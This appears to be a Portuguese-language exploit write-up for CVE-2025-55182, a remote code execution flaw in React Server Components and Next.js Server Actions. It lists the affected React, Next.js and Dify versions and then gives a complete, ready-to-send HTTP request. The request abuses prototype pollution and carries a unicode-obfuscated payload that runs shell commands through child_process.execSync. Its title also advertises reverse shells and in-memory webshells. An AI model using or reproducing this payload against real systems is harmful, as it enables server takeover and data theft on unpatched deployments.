
CVE-2025-55182(execução de comandos, shell reverso, injeção de webshell em memória)
Vulnerabilidade de execução remota de código nos React Server Components (CVE-2025-55182) e vulnerabilidade de execução remota de código no Next.js (CVE-2025-66478). Esta vulnerabilidade afeta principalmente a funcionalidade Server Actions do pacote react-server-dom-webpack. Devido à falta de validação de segurança ao analisar formulários enviados pelo cliente, um atacante pode, através da construção de uma solicitação de formulário maliciosa, chamar diretamente módulos integrados do Node.js, executando assim comandos arbitrários no servidor, lendo e escrevendo arquivos arbitrários, e até mesmo assumir completamente o controle do serviço; além disso, como as versões 15.x e 16.x do Next.js, ao usar o App Router, dependem de um pacote React DOM do lado do servidor com defeito, o atacante também pode injetar código malicioso para executar comandos remotamente.
React versão afetada == 19.0.0
React versão afetada == 19.0.1
React versão afetada == 19.1.0
React versão afetada == 19.2.0
react-server-dom-webpack pacote versão afetada == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel pacote versão afetada == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack pacote versão afetada == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
Next.js versão afetada >= 14.3.0-canary.77
Next.js 15.0.0 <= versão afetada < 15.0.5
Next.js 15.1.0 <= versão afetada < 15.1.9
Next.js 15.2.0 <= versão afetada < 15.2.6
Next.js 15.3.0 <= versão afetada < 15.3.6
Next.js 15.4.0 <= versão afetada < 15.4.8
Next.js 15.5.0 <= versão afetada < 15.5.7
Next.js 16.0.0 <= versão afetada < 16.0.7
Dify 1.1.2 <= versão afetada < 1.10.1-fix.1
POST /c9436a490867 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 1755
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Next-Action: x
Connection: close
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"\u0074\u0072\u0079\u0020\u007b\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0073\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u002e\u006d\u0061\u0069\u006e\u004d\u006f\u0064\u0075\u006c\u0065\u002e\u0072\u0065\u0071\u0075\u0069\u0072\u0065\u0028\u0027\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u0027\u0029\u002e\u0065\u0078\u0065\u0063\u0053\u0079\u006e\u0063\u0028\u0027\u0065\u0063\u0068\u006f\u0020\u0051\u0041\u0058\u004e\u0042\u0031\u0032\u0031\u0033\u0038\u0027\u0029\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0027\u0062\u0061\u0073\u0065\u0036\u0034\u0027\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u0020\u007b\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0073\u0020\u003d\u0020\u0027\u0045\u0052\u0052\u004f\u0052\u0027\u003b\u0020\u007d\u0020\u0074\u0068\u0072\u006f\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u002e\u0061\u0073\u0073\u0069\u0067\u006e\u0028\u006e\u0065\u0077\u0020\u0045\u0072\u0072\u006f\u0072\u0028\u0027\u0078\u0027\u0029\u002c\u007b\u0064\u0069\u0067\u0065\u0073\u0074\u003a\u0072\u0065\u0073\u007d\u0029\u003b","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="1"
"$@0"
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="2"
[]
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd--